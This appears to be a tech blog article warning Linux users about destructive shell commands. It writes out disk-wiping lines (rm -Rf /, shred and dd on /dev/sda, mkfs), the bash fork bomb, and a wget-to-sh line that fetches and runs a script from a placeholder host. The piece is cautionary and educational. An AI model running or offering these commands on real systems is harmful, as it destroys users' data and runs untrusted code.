linux most dangerous commands

linux most dangerous commandsShort Bytes: The internet has long been inhabited by tricksters, no-good-doers, and what are now known colloquially as trolls. We’ve all seen the too common forum post asking for help where someone insists that deleting the “system32” file is the sure-fire way of remedying the problem. Less known are the Linux analogues and we are going to share you some of them with you

There are many commands that can irreversibly damage your system. Some are less cryptic than others, some look like plain gibberish. Here is a list of dangerous commands on Linux, some permanent and some that can be recovered from.

Irreversible Linux Commands – The Most Dangerous Ones

rm -Rf /

This command has gained a lot of notoriety, and is particularly dangerous. Thankfully, many UNIX systems have placed a safeguard into the rm command to ensure that it doesn’t happen accidentally or unintentionally. It might be confusing to think that something so destructive could be run accidentally, but it’s really as simple as using an uninitialized variable in a BASH script and not checking it before running the command.

shred /dev/sda

Shred is a particularly dangerous command, unlike in the case of rm where anyone with some data recovery knowledge can data-carve the volume for any important files, shred does just as the name suggests. Shred feeds off of the operating systems /dev/random or /dev/urandom to generate random information. This information is then used to overwrite the drive in several passes rendering the data irretrievable. Even if you manage to interrupt the process before it gets through too much of your data, you’ll still have to rebuild your partition table and repair any filesystems that may have been touched. Shred is certainly a dangerous command if not used carefully.

dd if=/dev/random of=/dev/sda

dd is an amazingly useful tool. It can be used for making clones of volumes, filesystems, writing images to disks, and even erasing drives.The above dd command accomplishes something that is about the same as shred, with the only differences being that shred is much faster and does multiple passes by default.

mkfs.ext4 /dev/sda1

As Picasso said, “every act of creation is first an act of destruction,” and the same is true with mkfs. The fault here doesn’t lie with ext4 particularly, only that in order to create a new filesystem you must discard all existing data on the volume. This obviously isn’t a trouble on a shiny new disk, but it can bring a running system to its knees if it’s used without discretion.

mv / /dev/null

This one is on par with our first. Anything written to /dev/null will write successfully. This means that this command is effectively the same as our first, although it might take longer to accomplish.

Dangerous, Although Reversible Linux Commands

:(){:|:&};:

This cryptic string is BASH wizardry at it’s most evil and arcane. It’s known by the common name of the BASH Fork Bomb. Its other names are Rabbit Virus or Wabbit. Its construction is elegant and deadly, bringing any system to halt if the proper security measures aren’t put in place. The command simply creates a function named : with the :() in the beginning, it then goes on to define the contents of the function with {:|:&}, this again is very simple as it only executes itself and pipes into another call of itself while backgrounding the process. Finally, the function definition is terminated with the ; and called with the :. To defend against this type of attack you need to implements precautions in the /etc/security/limits.conf configuration file.

wget https://unknownsource.com/possiblydangerous.sh -O- | sh

This one should be a no-brainer. While wget is a useful tool, anything you download, especially executables, should be inspected if they come from an unknown or untrusted source. This command downloads the script and pipes it into sh which is usually just a symbolic link to BASH. So, anything in the script will be executed provided the user has sufficient privilege. The contents of the script would quite possibly be any of the previously mentioned commands.

gunzip untrusted.gz

The seldom known Decompression Bomb is pretty unique in its approach. Compression relies on order in information to compress at higher ratios, considering that, a file filled with ones or zeros would be able to be compressed to a very high ratio, the resulting file could be orders smaller than the original. And that’s exactly what the Decompression Bomb is. It is a file that when decompressed will fill the disk space. On a Linux machine, this can be fatal to many system services that require logging or writing to a file. For that reason, decompressing any untrusted file can be very dangerous.

command > file.conf

The redirection feature of BASH is extremely useful, but when it’s used without care, it can end up wiping out an important configuration file. Remembering to distinguish between > and >>, or replace and append, can be difficult to the beginner. It’s even common for professionals to overlook it and lose files. That’s why you should always double check, or even triple check, the commands you run.

^mistake^correction

This is a substitution to correct a mistake made in the previous command. It’s not something to keep at the top of your toolbox, but it’s something particularly handy when running long commands. The danger here comes from the fact that it can substitute malicious content into previously run commands, so it’s especially important to be diligent in inspecting both the previous command and the substitution.

Surely, there are many more commands that can disrupt or permanently impair a system. Did we miss any big ones? Do you know of any obscure ones? Let us know in the comments below.

Also Read: Your Ubuntu Linux Terminal Experience Is About To Get A Whole Lot Better

Similar Posts